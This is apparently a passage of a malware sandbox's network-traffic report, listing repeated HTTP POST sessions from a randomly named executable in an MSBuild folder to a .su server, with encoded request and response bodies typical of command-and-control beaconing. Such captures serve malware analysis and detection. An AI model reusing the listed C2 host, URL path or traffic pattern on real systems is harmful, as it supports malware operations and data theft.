                                                                                      Date: Wed, 06 Mar 2024 08:53:09 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49777 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
Timestamp | Bytes transferred | Direction | Data
Mar 6, 2024 09:53:10.118127108 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
Mar 6, 2024 09:53:10.461328030 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 6, 2024 09:53:10.461596012 CET | 2548 | OUT |
Mar 6, 2024 09:53:10.829400063 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:10 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49778 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
Timestamp | Bytes transferred | Direction | Data
Mar 6, 2024 09:53:11.292047024 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
Mar 6, 2024 09:53:11.633332014 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 6, 2024 09:53:11.873644114 CET | 2548 | OUT |
Mar 6, 2024 09:53:12.241833925 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:12 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49779 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
Timestamp | Bytes transferred | Direction | Data
Mar 6, 2024 09:53:12.829269886 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:13.172041893 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:13.172352076 CET | 2548 | OUT | Data Raw: 54 50 54 5c 5b 5f 50 50 5e 57 5a 51 57 5b 50 5e 54 51 54 5f 56 5f 57 59 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TPT\[_PP^WZQW[P^TQT_V_WYQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9;*$ 5Z'5"-?$<2P6?<V6,+_3$+1,8)%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:13.546758890 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:13 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      37 | 192.168.2.4 | 49780 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:14.016043901 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:14.358999014 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:14.359235048 CET | 2548 | OUT | Data Raw: 54 59 54 51 5e 5d 55 57 5e 57 5a 51 57 5b 50 52 54 50 54 5e 56 5f 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TYTQ^]UW^WZQW[PRTPT^V_W[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9E,*30_8/*$(Y%9,6?+6/]&';X19,%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:14.734859943 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:14 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      38 | 192.168.2.4 | 49781 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:15.123253107 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:15.466053009 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:15.466387033 CET | 1872 | OUT | Data Raw: 54 51 51 59 5e 5e 55 52 5e 57 5a 51 57 58 50 5b 54 56 54 52 56 5a 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQQY^^UR^WZQWXP[TVTRVZW[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9,"9' %\3%860;;Z1_'! "Z#3422]/9%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:15.839705944 CET | 435 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:15 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2e 1f 31 3b 37 55 34 0a 27 09 2a 3d 2e 5a 2a 22 35 07 28 28 26 05 3d 2f 0c 14 38 07 02 50 3f 01 3c 1b 37 2f 30 1b 22 21 3f 0a 31 39 20 5c 05 11 24 07 27 32 03 59 24 2a 25 13 30 1f 2a 07 25 2f 01 41 28 02 3d 05 24 29 05 10 34 0d 2c 55 31 04 30 07 26 2f 2a 05 39 3e 30 00 31 3d 2d 54 02 17 21 08 24 2d 27 05 3f 0e 33 10 25 22 0b 15 28 2d 0a 56 22 00 38 1e 36 0a 3d 12 26 3b 3d 01 22 1c 02 05 28 5e 27 59 27 3c 30 57 25 2e 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98.1;7U4'*=.Z*"5((&=/8P?<7/0"!?19 \$'2Y$*%0*%/A(=$)4,U10&/*9>01=-T!$-'?3%"(-V"86=&;="(^'Y'<0W%.#U",R?\W0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      39 | 192.168.2.4 | 49782 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:15.196578979 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:15.539757967 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:15.540092945 CET | 2548 | OUT | Data Raw: 54 5b 54 59 5b 5f 55 56 5e 57 5a 51 57 5e 50 5c 54 54 54 5d 56 5f 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T[TY[_UV^WZQW^P\TTT]V_W[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:8W6S00:3:\/'?1<Q5"3Y'B+Y&<),9%Z"!Q*
                                                                                      Mar 6, 2024 09:53:15.912139893 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:15 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      40 | 192.168.2.4 | 49783 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:16.385281086 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:16.728610039 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:16.728928089 CET | 2548 | OUT | Data Raw: 51 59 54 58 5e 5d 50 57 5e 57 5a 51 57 5e 50 5e 54 53 54 5c 56 59 57 5d 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYTX^]PW^WZQW^P^TST\VYW]QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C8109[06/Y-$8/[190"/8"Y0$<X/9%Z"!Q*
                                                                                      Mar 6, 2024 09:53:17.100050926 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:16 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      41 | 192.168.2.4 | 49784 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:17.575922966 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:17.933948040 CET | 2548 | OUT | Data Raw: 54 58 54 5f 5b 5a 55 56 5e 57 5a 51 57 58 50 58 54 54 54 52 56 5f 57 5f 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TXT_[ZUV^WZQWXPXTTTRV_W_QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9E8120#!$55/?'^$%)3!6<+]'7\%,!8%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:17.936156988 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:18.309480906 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:18 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      42 | 192.168.2.4 | 49785 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:18.778947115 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:19.136964083 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:19.137192965 CET | 2548 | OUT | Data Raw: 54 51 54 5d 5e 5e 50 50 5e 57 5a 51 57 5a 50 5e 54 51 54 5f 56 5a 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQT]^^PP^WZQWZP^TQT_VZWUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9D;5'&5"8*Y$+&$T"/7#,3\3$,2.89%Z"!Q*%
                                                                                      Mar 6, 2024 09:53:19.510304928 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:19 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      43 | 192.168.2.4 | 49786 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:19.981386900 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:20.327007055 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:20.327337980 CET | 2548 | OUT | Data Raw: 51 5d 51 5b 5e 5e 50 54 5e 57 5a 51 57 5f 50 53 54 50 54 5e 56 58 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q]Q[^^PT^WZQW_PSTPT^VXWUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9A;2:S00&$*\,?!3('\&9/!Z75?<'7<%Z&\,)%Z"!Q*1
                                                                                      Mar 6, 2024 09:53:20.703233004 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:20 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      44 | 192.168.2.4 | 49787 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:21.174117088 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:21.517261028 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:21.517719030 CET | 2548 | OUT | Data Raw: 51 5e 54 59 5e 5a 55 51 5e 57 5a 51 57 51 50 58 54 54 54 5f 56 5f 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q^TY^ZUQ^WZQWQPXTTT_V_WUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9.")03!\$5!/&+31_,6/8W!,07^$/>\,%Z"!Q*
                                                                                      Mar 6, 2024 09:53:21.889686108 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:21 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      45          192.168.2.4  49788        91.227.16.11    80                4520  C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp                           Bytes transferred  Direction  Data
                                                                                      Mar 6, 2024 09:53:21.207469940 CET  348                OUT        POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:21.552423954 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:21.552689075 CET  1872               OUT        Data Raw: 51 5b 54 51 5b 5b 55 55 5e 57 5a 51 57 5d 50 53 54 53 54 5d 56 5f 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q[TQ[[UU^WZQW]PSTST]V_WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C8W5%3!$%&_8<-&('\%*'!?$U#<?^'4(%,/)%Z"!Q*9
                                                                                      Mar 6, 2024 09:53:21.923326015 CET  435                IN         HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:21 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
